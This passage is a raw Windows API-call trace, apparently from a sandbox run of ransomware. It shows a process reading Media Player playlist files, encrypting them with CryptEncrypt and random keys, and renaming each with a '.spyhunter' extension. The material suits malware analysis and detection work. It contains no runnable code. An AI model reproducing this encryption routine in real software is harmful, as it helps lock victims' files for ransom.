lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.450] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl") returned 107 [0141.450] StrStrW (lpFirst="11_All_Pictures.wpl", lpSrch=".txt") returned 0x0 [0141.450] GetProcessHeap () returned 0x2c0000 [0141.450] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.450] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f0ac*=0x249, lpOverlapped=0x0) returned 1 [0141.451] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffdb7, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.452] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x249, lpNumberOfBytesWritten=0x57f0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f0ac*=0x249, lpOverlapped=0x0) returned 1 [0141.452] GetProcessHeap () returned 0x2c0000 [0141.452] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.452] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.452] WriteFile (in: hFile=0x184, lpBuffer=0x57f0ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f0ac, lpOverlapped=0x0 | out: lpBuffer=0x57f0ec*, lpNumberOfBytesWritten=0x57f0ac*=0x4, lpOverlapped=0x0) returned 1 [0141.452] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f0ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f0ac*=0x30, lpOverlapped=0x0) returned 1 [0141.452] CloseHandle (hObject=0x184) returned 1 [0141.452] GetProcessHeap () returned 0x2c0000 [0141.452] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.452] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.spyhunter") returned 117 [0141.452] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\11_All_Pictures.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\11_all_pictures.wpl.spyhunter")) returned 1 [0141.453] GetProcessHeap () returned 0x2c0000 [0141.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.453] GetProcessHeap () returned 0x2c0000 [0141.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.453] GetProcessHeap () returned 0x2c0000 [0141.453] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fface8 | out: hHeap=0x2c0000) returned 1 [0141.453] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0f0 | out: pbBuffer=0x57f0f0) returned 1 [0141.453] GetProcessHeap () returned 0x2c0000 [0141.453] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.453] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0e8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0e8*=0x30) returned 1 [0141.453] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.454] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl") returned 104 [0141.454] StrStrW (lpFirst="10_All_Music.wpl", lpSrch=".txt") returned 0x0 [0141.454] GetProcessHeap () returned 0x2c0000 [0141.454] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.454] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f0ac*=0x427, lpOverlapped=0x0) returned 1 [0141.456] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffbd9, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.456] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x427, lpNumberOfBytesWritten=0x57f0ac, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f0ac*=0x427, lpOverlapped=0x0) returned 1 [0141.457] GetProcessHeap () returned 0x2c0000 [0141.457] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.457] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.457] WriteFile (in: hFile=0x184, lpBuffer=0x57f0ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f0ac, lpOverlapped=0x0 | out: lpBuffer=0x57f0ec*, lpNumberOfBytesWritten=0x57f0ac*=0x4, lpOverlapped=0x0) returned 1 [0141.457] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f0ac, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f0ac*=0x30, lpOverlapped=0x0) returned 1 [0141.457] CloseHandle (hObject=0x184) returned 1 [0141.457] GetProcessHeap () returned 0x2c0000 [0141.457] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.457] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.spyhunter") returned 114 [0141.457] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\10_All_Music.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\10_all_music.wpl.spyhunter")) returned 1 [0141.458] GetProcessHeap () returned 0x2c0000 [0141.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.458] GetProcessHeap () returned 0x2c0000 [0141.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.458] GetProcessHeap () returned 0x2c0000 [0141.458] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ffabc0 | out: hHeap=0x2c0000) returned 1 [0141.458] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0e8 | out: pbBuffer=0x57f0e8) returned 1 [0141.458] GetProcessHeap () returned 0x2c0000 [0141.458] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.458] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0e0*=0x30) returned 1 [0141.458] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.459] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl") returned 116 [0141.459] StrStrW (lpFirst="09_Music_played_the_most.wpl", lpSrch=".txt") returned 0x0 [0141.459] GetProcessHeap () returned 0x2c0000 [0141.459] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.459] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f0a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f0a4*=0x401, lpOverlapped=0x0) returned 1 [0141.461] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffbff, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.461] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x401, lpNumberOfBytesWritten=0x57f0a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f0a4*=0x401, lpOverlapped=0x0) returned 1 [0141.461] GetProcessHeap () returned 0x2c0000 [0141.461] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.461] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.461] WriteFile (in: hFile=0x184, lpBuffer=0x57f0e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f0a4, lpOverlapped=0x0 | out: lpBuffer=0x57f0e4*, lpNumberOfBytesWritten=0x57f0a4*=0x4, lpOverlapped=0x0) returned 1 [0141.461] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f0a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f0a4*=0x30, lpOverlapped=0x0) returned 1 [0141.461] CloseHandle (hObject=0x184) returned 1 [0141.461] GetProcessHeap () returned 0x2c0000 [0141.461] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.461] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.spyhunter") returned 126 [0141.461] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\09_Music_played_the_most.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\09_music_played_the_most.wpl.spyhunter")) returned 1 [0141.462] GetProcessHeap () returned 0x2c0000 [0141.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.462] GetProcessHeap () returned 0x2c0000 [0141.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.462] GetProcessHeap () returned 0x2c0000 [0141.462] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fe9d60 | out: hHeap=0x2c0000) returned 1 [0141.462] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0e8 | out: pbBuffer=0x57f0e8) returned 1 [0141.462] GetProcessHeap () returned 0x2c0000 [0141.462] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.462] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0e0*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0e0*=0x30) returned 1 [0141.462] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.463] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl") returned 122 [0141.463] StrStrW (lpFirst="08_Video_rated_at_4_or_5_stars.wpl", lpSrch=".txt") returned 0x0 [0141.463] GetProcessHeap () returned 0x2c0000 [0141.463] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.463] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f0a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f0a4*=0x3fc, lpOverlapped=0x0) returned 1 [0141.464] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffc04, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.464] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x3fc, lpNumberOfBytesWritten=0x57f0a4, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f0a4*=0x3fc, lpOverlapped=0x0) returned 1 [0141.464] GetProcessHeap () returned 0x2c0000 [0141.464] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.464] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.464] WriteFile (in: hFile=0x184, lpBuffer=0x57f0e4*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f0a4, lpOverlapped=0x0 | out: lpBuffer=0x57f0e4*, lpNumberOfBytesWritten=0x57f0a4*=0x4, lpOverlapped=0x0) returned 1 [0141.465] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f0a4, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f0a4*=0x30, lpOverlapped=0x0) returned 1 [0141.465] CloseHandle (hObject=0x184) returned 1 [0141.465] GetProcessHeap () returned 0x2c0000 [0141.465] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.465] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.spyhunter") returned 132 [0141.465] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\08_Video_rated_at_4_or_5_stars.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\08_video_rated_at_4_or_5_stars.wpl.spyhunter")) returned 1 [0141.465] GetProcessHeap () returned 0x2c0000 [0141.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.465] GetProcessHeap () returned 0x2c0000 [0141.465] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.466] GetProcessHeap () returned 0x2c0000 [0141.466] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f04a50 | out: hHeap=0x2c0000) returned 1 [0141.466] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0e0 | out: pbBuffer=0x57f0e0) returned 1 [0141.466] GetProcessHeap () returned 0x2c0000 [0141.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.466] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0d8*=0x30) returned 1 [0141.466] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x184 [0141.466] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl") returned 123 [0141.466] StrStrW (lpFirst="07_TV_recorded_in_the_last_week.wpl", lpSrch=".txt") returned 0x0 [0141.466] GetProcessHeap () returned 0x2c0000 [0141.466] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c375d8 [0141.466] ReadFile (in: hFile=0x184, lpBuffer=0x2c375d8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f09c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesRead=0x57f09c*=0x410, lpOverlapped=0x0) returned 1 [0141.470] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0xfffffbf0, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.470] WriteFile (in: hFile=0x184, lpBuffer=0x2c375d8*, nNumberOfBytesToWrite=0x410, lpNumberOfBytesWritten=0x57f09c, lpOverlapped=0x0 | out: lpBuffer=0x2c375d8*, lpNumberOfBytesWritten=0x57f09c*=0x410, lpOverlapped=0x0) returned 1 [0141.470] GetProcessHeap () returned 0x2c0000 [0141.470] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c375d8 | out: hHeap=0x2c0000) returned 1 [0141.470] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.471] WriteFile (in: hFile=0x184, lpBuffer=0x57f0dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f09c, lpOverlapped=0x0 | out: lpBuffer=0x57f0dc*, lpNumberOfBytesWritten=0x57f09c*=0x4, lpOverlapped=0x0) returned 1 [0141.471] WriteFile (in: hFile=0x184, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f09c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f09c*=0x30, lpOverlapped=0x0) returned 1 [0141.471] CloseHandle (hObject=0x184) returned 1 [0141.471] GetProcessHeap () returned 0x2c0000 [0141.471] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2fd0048 [0141.471] wnsprintfW (in: pszDest=0x2fd0048, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.spyhunter") returned 133 [0141.471] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\07_TV_recorded_in_the_last_week.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\07_tv_recorded_in_the_last_week.wpl.spyhunter")) returned 1 [0141.471] GetProcessHeap () returned 0x2c0000 [0141.471] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2fd0048 | out: hHeap=0x2c0000) returned 1 [0141.472] GetProcessHeap () returned 0x2c0000 [0141.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.472] GetProcessHeap () returned 0x2c0000 [0141.472] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f04908 | out: hHeap=0x2c0000) returned 1 [0141.472] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0e0 | out: pbBuffer=0x57f0e0) returned 1 [0141.472] GetProcessHeap () returned 0x2c0000 [0141.472] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x70) returned 0x31f020 [0141.472] CryptEncrypt (in: hKey=0x2d4db8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x31f020*, pdwDataLen=0x57f0d8*=0x20, dwBufLen=0x30 | out: pbData=0x31f020*, pdwDataLen=0x57f0d8*=0x30) returned 1 [0141.472] CreateFileW (lpFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x16c [0141.528] lstrlenW (lpString="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl") returned 127 [0141.529] StrStrW (lpFirst="05_Pictures_taken_in_the_last_month.wpl", lpSrch=".txt") returned 0x0 [0141.529] GetProcessHeap () returned 0x2c0000 [0141.529] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x2840) returned 0x2c321c8 [0141.529] ReadFile (in: hFile=0x16c, lpBuffer=0x2c321c8, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x57f09c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesRead=0x57f09c*=0x31d, lpOverlapped=0x0) returned 1 [0141.530] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffffce3, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0141.530] WriteFile (in: hFile=0x16c, lpBuffer=0x2c321c8*, nNumberOfBytesToWrite=0x31d, lpNumberOfBytesWritten=0x57f09c, lpOverlapped=0x0 | out: lpBuffer=0x2c321c8*, lpNumberOfBytesWritten=0x57f09c*=0x31d, lpOverlapped=0x0) returned 1 [0141.530] GetProcessHeap () returned 0x2c0000 [0141.530] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2c321c8 | out: hHeap=0x2c0000) returned 1 [0141.530] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0141.530] WriteFile (in: hFile=0x16c, lpBuffer=0x57f0dc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x57f09c, lpOverlapped=0x0 | out: lpBuffer=0x57f0dc*, lpNumberOfBytesWritten=0x57f09c*=0x4, lpOverlapped=0x0) returned 1 [0141.530] WriteFile (in: hFile=0x16c, lpBuffer=0x31f020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x57f09c, lpOverlapped=0x0 | out: lpBuffer=0x31f020*, lpNumberOfBytesWritten=0x57f09c*=0x30, lpOverlapped=0x0) returned 1 [0141.530] CloseHandle (hObject=0x16c) returned 1 [0141.531] GetProcessHeap () returned 0x2c0000 [0141.531] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2f6eda0 [0141.531] wnsprintfW (in: pszDest=0x2f6eda0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.spyhunter") returned 137 [0141.531] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl"), lpNewFileName="\\\\?\\C:\\Users\\Default\\AppData\\Local\\Microsoft\\Media Player\\Sync Playlists\\en-US\\00010C6E\\05_Pictures_taken_in_the_last_month.wpl.spyhunter" (normalized: "c:\\users\\default\\appdata\\local\\microsoft\\media player\\sync playlists\\en-us\\00010c6e\\05_pictures_taken_in_the_last_month.wpl.spyhunter")) returned 1 [0141.531] GetProcessHeap () returned 0x2c0000 [0141.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f6eda0 | out: hHeap=0x2c0000) returned 1 [0141.531] GetProcessHeap () returned 0x2c0000 [0141.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31f020 | out: hHeap=0x2c0000) returned 1 [0141.531] GetProcessHeap () returned 0x2c0000 [0141.531] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2f04678 | out: hHeap=0x2c0000) returned 1 [0141.532] CryptGenRandom (in: hProv=0x2d5df8, dwLen=0x20, pbBuffer=0x57f0d8 | out: pbBuffer=0x57f0d8) returned 1 [0141.532] GetProcessHeap () returned 0x2c0000 [0141.532] RtlAllocateHeap 